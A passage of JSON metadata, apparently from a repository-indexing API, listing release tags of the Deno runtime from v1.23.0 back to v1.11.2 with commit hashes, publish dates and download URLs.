ts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"